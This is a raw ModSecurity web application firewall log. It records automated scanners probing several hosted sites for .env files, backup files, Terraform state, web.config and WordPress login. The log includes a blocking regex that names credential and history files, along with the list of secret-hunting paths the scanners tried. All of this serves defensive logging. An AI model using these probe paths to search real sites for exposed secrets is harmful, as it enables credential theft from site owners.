[Tue May 26 13:04:27.354249 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-CQAAAME"]
[Tue May 26 13:04:27.396792 2026] [security2:error] [pid 485064:tid 485247] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-DAAAALo"]
[Tue May 26 13:04:27.406646 2026] [security2:error] [pid 485064:tid 485303] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-DwAAAPI"]
[Tue May 26 13:04:27.407191 2026] [security2:error] [pid 485064:tid 485244] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-EgAAALc"]
[Tue May 26 13:04:27.449515 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/src/.env"] [unique_id "ahVNAz9tlF55stOmSqH-FgAAAN0"]
[Tue May 26 13:04:27.538370 2026] [security2:error] [pid 485064:tid 485283] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-GQAAAN4"]
[Tue May 26 13:04:27.556012 2026] [security2:error] [pid 485064:tid 485301] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-GgAAAPA"]
[Tue May 26 13:04:27.560191 2026] [security2:error] [pid 485064:tid 485270] [client 195.178.110.199:42436] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-HAAAANE"]
[Tue May 26 13:04:27.564155 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-GwAAAMo"]
[Tue May 26 13:04:27.567700 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-HwAAAN8"]
[Tue May 26 13:04:27.576647 2026] [security2:error] [pid 485064:tid 485297] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-IgAAAOw"]
[Tue May 26 13:04:27.593214 2026] [security2:error] [pid 485064:tid 485262] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-KAAAAMk"]
[Tue May 26 13:04:27.661285 2026] [security2:error] [pid 485064:tid 485087] [remote 51.91.98.45:33346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVNAz9tlF55stOmSqH-FwABARY"]
[Tue May 26 13:04:27.669246 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-MQAAAIc"]
[Tue May 26 13:04:27.715752 2026] [security2:error] [pid 485064:tid 485299] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/srv/.env"] [unique_id "ahVNAz9tlF55stOmSqH-NwAAAO4"]
[Tue May 26 13:04:27.720707 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-MgAAAPc"]
[Tue May 26 13:04:27.733216 2026] [security2:error] [pid 485064:tid 485261] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-MwAAAMg"]
[Tue May 26 13:04:27.822359 2026] [security2:error] [pid 485064:tid 485312] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-OgAAAPs"]
[Tue May 26 13:04:27.888636 2026] [security2:error] [pid 485064:tid 485214] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-QQAAAJk"]
[Tue May 26 13:04:27.894501 2026] [security2:error] [pid 485064:tid 485215] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-QwAAAJo"]
[Tue May 26 13:04:27.902050 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-RQAAAJg"]
[Tue May 26 13:04:27.915691 2026] [security2:error] [pid 485064:tid 485238] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-RwAAALE"]
[Tue May 26 13:04:27.946151 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-SAAAAJI"]
[Tue May 26 13:04:27.974091 2026] [security2:error] [pid 485064:tid 485250] [client 195.178.110.199:42382] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stg/.env"] [unique_id "ahVNAz9tlF55stOmSqH-SwAAAL0"]
[Tue May 26 13:04:27.983477 2026] [security2:error] [pid 485064:tid 485304] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shop/.env"] [unique_id "ahVNAz9tlF55stOmSqH-TAAAAPM"]
[Tue May 26 13:04:28.000702 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-SgAAAME"]
[Tue May 26 13:04:28.061033 2026] [security2:error] [pid 485064:tid 485251] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-VQAAAL4"]
[Tue May 26 13:04:28.072944 2026] [security2:error] [pid 485064:tid 485224] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-VgAAAKM"]
[Tue May 26 13:04:28.093639 2026] [security2:error] [pid 485064:tid 485212] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stripe/.env"] [unique_id "ahVNBD9tlF55stOmSqH-WwAAAJc"]
[Tue May 26 13:04:28.109398 2026] [security2:error] [pid 485064:tid 485259] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/stage/.env"] [unique_id "ahVNBD9tlF55stOmSqH-XQAAAMY"]
[Tue May 26 13:04:28.118325 2026] [security2:error] [pid 485064:tid 485209] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-WQAAAJQ"]
[Tue May 26 13:04:28.120463 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:42436] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-WgAAAN0"]
[Tue May 26 13:04:28.142688 2026] [security2:error] [pid 485064:tid 485268] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/staging/.env"] [unique_id "ahVNBD9tlF55stOmSqH-awAAAM8"]
[Tue May 26 13:04:28.166162 2026] [security2:error] [pid 485064:tid 485283] [client 195.178.110.199:42382] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-XgAAAN4"]
[Tue May 26 13:04:28.208088 2026] [security2:error] [pid 485064:tid 485252] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-ggAAAL8"]
[Tue May 26 13:04:28.256260 2026] [security2:error] [pid 485064:tid 485248] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-jAAAALs"]
[Tue May 26 13:04:28.264883 2026] [security2:error] [pid 485064:tid 485197] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-jwAAAIg"]
[Tue May 26 13:04:28.273742 2026] [security2:error] [pid 485064:tid 485206] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-kgAAAJE"]
[Tue May 26 13:04:28.321319 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-mAAAAIc"]
[Tue May 26 13:04:28.433097 2026] [security2:error] [pid 485064:tid 485210] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/test/.env"] [unique_id "ahVNBD9tlF55stOmSqH-rQAAAJU"]
[Tue May 26 13:04:28.472095 2026] [security2:error] [pid 485064:tid 485221] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-sAAAAKA"]
[Tue May 26 13:04:28.489528 2026] [security2:error] [pid 485064:tid 485293] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-sgAAAOg"]
[Tue May 26 13:04:28.537597 2026] [security2:error] [pid 485064:tid 485238] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-uAAAALE"]
[Tue May 26 13:04:28.578084 2026] [security2:error] [pid 485064:tid 485304] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-vgAAAPM"]
[Tue May 26 13:04:28.620764 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-xAAAAO0"]
[Tue May 26 13:04:28.681645 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-zQAAAOo"]
[Tue May 26 13:04:28.689266 2026] [security2:error] [pid 485064:tid 485276] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVNBD9tlF55stOmSqH-0QAAANc"]
[Tue May 26 13:04:28.704969 2026] [security2:error] [pid 485064:tid 485277] [client 195.178.110.199:42436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/user/.env"] [unique_id "ahVNBD9tlF55stOmSqH-0gAAANg"]
[Tue May 26 13:04:28.804501 2026] [security2:error] [pid 485064:tid 485268] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-1gAAAM8"]
[Tue May 26 13:04:28.999361 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBD9tlF55stOmSqH-5gAAAK8"]
[Tue May 26 13:04:29.072607 2026] [security2:error] [pid 485064:tid 485147] [remote 91.92.42.86:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "kingsclub.in"] [uri "/web.config"] [unique_id "ahVNBT9tlF55stOmSqH-7AABAFI"], referer: http://kingsclub.in/web.config
[Tue May 26 13:04:29.117317 2026] [security2:error] [pid 485064:tid 485151] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/db.php"] [unique_id "ahVNBT9tlF55stOmSqH-8QAA9lY"], referer: http://kingsclub.in/db.php
[Tue May 26 13:04:29.187601 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-9QAAAME"]
[Tue May 26 13:04:29.232180 2026] [security2:error] [pid 485064:tid 485162] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/settings.php"] [unique_id "ahVNBT9tlF55stOmSqH_AQAAqmE"], referer: http://kingsclub.in/settings.php
[Tue May 26 13:04:29.234240 2026] [security2:error] [pid 485064:tid 485188] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/database.php"] [unique_id "ahVNBT9tlF55stOmSqH_AgAA4Xs"], referer: http://kingsclub.in/database.php
[Tue May 26 13:04:29.248411 2026] [security2:error] [pid 485064:tid 485300] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-_gAAAO8"]
[Tue May 26 13:04:29.274404 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_AAAAAO0"]
[Tue May 26 13:04:29.311415 2026] [security2:error] [pid 485064:tid 485222] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v2/.env"] [unique_id "ahVNBT9tlF55stOmSqH_CAAAAKE"]
[Tue May 26 13:04:29.313928 2026] [security2:error] [pid 485064:tid 485294] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_BwAAAOk"]
[Tue May 26 13:04:29.339225 2026] [security2:error] [pid 485064:tid 485279] [client 195.178.110.199:42450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/test.php"] [unique_id "ahVNBT9tlF55stOmSqH_DAAAANo"]
[Tue May 26 13:04:29.348503 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_CwAAAN0"]
[Tue May 26 13:04:29.357046 2026] [security2:error] [pid 485064:tid 485187] [remote 91.92.42.86:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kingsclub.in"] [uri "/.env.bak"] [unique_id "ahVNBT9tlF55stOmSqH_DgAAtno"], referer: http://kingsclub.in/.env.bak
